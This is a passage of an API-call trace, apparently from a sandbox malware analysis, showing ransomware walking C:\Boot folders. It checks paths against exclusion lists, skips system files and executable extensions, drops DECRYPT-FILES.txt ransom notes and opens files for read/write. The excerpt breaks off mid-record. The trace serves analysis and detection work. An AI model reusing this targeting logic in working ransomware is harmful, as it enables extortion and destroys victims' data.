[0071.229] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.229] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0071.229] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.229] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\es-ES\\" | out: lpString1="C:\\Boot\\es-ES\\") returned="C:\\Boot\\es-ES\\" [0071.229] lstrcatW (in: lpString1="C:\\Boot\\es-ES\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\es-ES\\jkbimi8.tmp") returned="C:\\Boot\\es-ES\\jkbimi8.tmp" [0071.229] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.229] CreateFileW (lpFileName="C:\\Boot\\es-ES\\jkbimi8.tmp" (normalized: "c:\\boot\\es-es\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.229] CloseHandle (hObject=0x0) returned 0 [0071.229] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.229] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.229] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.230] CloseHandle (hObject=0x420) returned 1 [0071.230] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0071.230] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0071.230] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0071.230] lstrcatW (in: lpString1="fi-FI", lpString2="\\" | out: lpString1="fi-FI\\") returned="fi-FI\\" [0071.230] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="fi-FI\\" | out: lpString1="C:\\Boot\\fi-FI\\") returned="C:\\Boot\\fi-FI\\" [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Program Files") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch=":\\Windows") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Games\\") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\All Users") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="AhnLab") returned 0x0 [0071.230] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.230] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0071.230] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.230] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\fi-FI\\\\jkbimi8.tmp") returned 26 [0071.230] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\\\jkbimi8.tmp" (normalized: "c:\\boot\\fi-fi\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.231] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0071.231] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.231] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\fi-FI\\\\DECRYPT-FILES.txt") returned 32 [0071.231] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\fi-fi\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.231] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.232] CloseHandle (hObject=0x424) returned 1 [0071.232] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0071.232] lstrcatW (in: lpString1="C:\\Boot\\fi-FI\\", lpString2="*" | out: lpString1="C:\\Boot\\fi-FI\\*") returned="C:\\Boot\\fi-FI\\*" [0071.232] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.232] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.232] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.232] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.232] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.232] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.232] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.233] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.233] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.233] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.233] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.233] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.233] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.233] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0071.233] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.233] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\fi-FI\\" | out: lpString1="C:\\Boot\\fi-FI\\") returned="C:\\Boot\\fi-FI\\" [0071.233] lstrcatW (in: lpString1="C:\\Boot\\fi-FI\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned="C:\\Boot\\fi-FI\\bootmgr.exe.mui" [0071.233] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.233] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.233] CloseHandle (hObject=0x0) returned 0 [0071.233] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.234] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6aeb4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.234] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.234] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6aeb4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.234] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.234] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.234] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.234] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.234] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.234] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.234] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0071.234] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.234] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\fi-FI\\" | out: lpString1="C:\\Boot\\fi-FI\\") returned="C:\\Boot\\fi-FI\\" [0071.234] lstrcatW (in: lpString1="C:\\Boot\\fi-FI\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\fi-FI\\jkbimi8.tmp") returned="C:\\Boot\\fi-FI\\jkbimi8.tmp" [0071.234] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.234] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\jkbimi8.tmp" (normalized: "c:\\boot\\fi-fi\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.235] CloseHandle (hObject=0x0) returned 0 [0071.235] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.235] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6aeb4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.235] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.235] CloseHandle (hObject=0x420) returned 1 [0071.235] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0071.235] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0071.235] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0071.235] lstrcatW (in: lpString1="Fonts", lpString2="\\" | out: lpString1="Fonts\\") returned="Fonts\\" [0071.235] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Program Files") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch=":\\Windows") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Games\\") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\All Users") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.235] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.236] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="AhnLab") returned 0x0 [0071.236] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.236] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.236] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.236] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\Fonts\\\\jkbimi8.tmp") returned 26 [0071.236] CreateFileW (lpFileName="C:\\Boot\\Fonts\\\\jkbimi8.tmp" (normalized: "c:\\boot\\fonts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.238] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.238] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.238] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\Fonts\\\\DECRYPT-FILES.txt") returned 32 [0071.238] CreateFileW (lpFileName="C:\\Boot\\Fonts\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\fonts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.238] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.239] CloseHandle (hObject=0x424) returned 1 [0071.239] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.239] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="*" | out: lpString1="C:\\Boot\\Fonts\\*") returned="C:\\Boot\\Fonts\\*" [0071.239] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.239] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.239] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.239] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.239] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.240] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="DECRYPT-FILES.txt") returned -1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="autorun.inf") returned 1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="boot.ini") returned 1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="desktop.ini") returned -1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="ntuser.dat") returned -1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="iconcache.db") returned -1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="bootsect.bak") returned 1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="ntuser.dat.log") returned -1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="thumbs.db") returned -1 [0071.240] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Bootfont.bin") returned 1 [0071.240] lstrlenW (lpString="chs_boot.ttf") returned 12 [0071.240] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0071.240] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0071.240] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0071.240] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0071.240] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.240] lstrlenW (lpString="chs_boot.ttf") returned 12 [0071.240] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0071.240] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="chs_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\chs_boot.ttf") returned="C:\\Boot\\Fonts\\chs_boot.ttf" [0071.240] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.240] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.240] CloseHandle (hObject=0x0) returned 0 [0071.240] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.241] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="DECRYPT-FILES.txt") returned -1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="autorun.inf") returned 1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="boot.ini") returned 1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="desktop.ini") returned -1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="ntuser.dat") returned -1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="iconcache.db") returned -1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="bootsect.bak") returned 1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="ntuser.dat.log") returned -1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="thumbs.db") returned -1 [0071.241] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Bootfont.bin") returned 1 [0071.241] lstrlenW (lpString="cht_boot.ttf") returned 12 [0071.241] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0071.241] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0071.241] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0071.241] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0071.241] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.241] lstrlenW (lpString="cht_boot.ttf") returned 12 [0071.241] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0071.241] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="cht_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\cht_boot.ttf") returned="C:\\Boot\\Fonts\\cht_boot.ttf" [0071.241] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.241] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.242] CloseHandle (hObject=0x0) returned 0 [0071.242] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.242] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6aeb4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.242] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.242] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6aeb4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, 